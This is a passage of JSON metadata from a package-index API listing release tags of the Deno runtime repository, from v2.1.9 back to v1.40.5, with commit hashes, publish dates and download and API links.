d%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G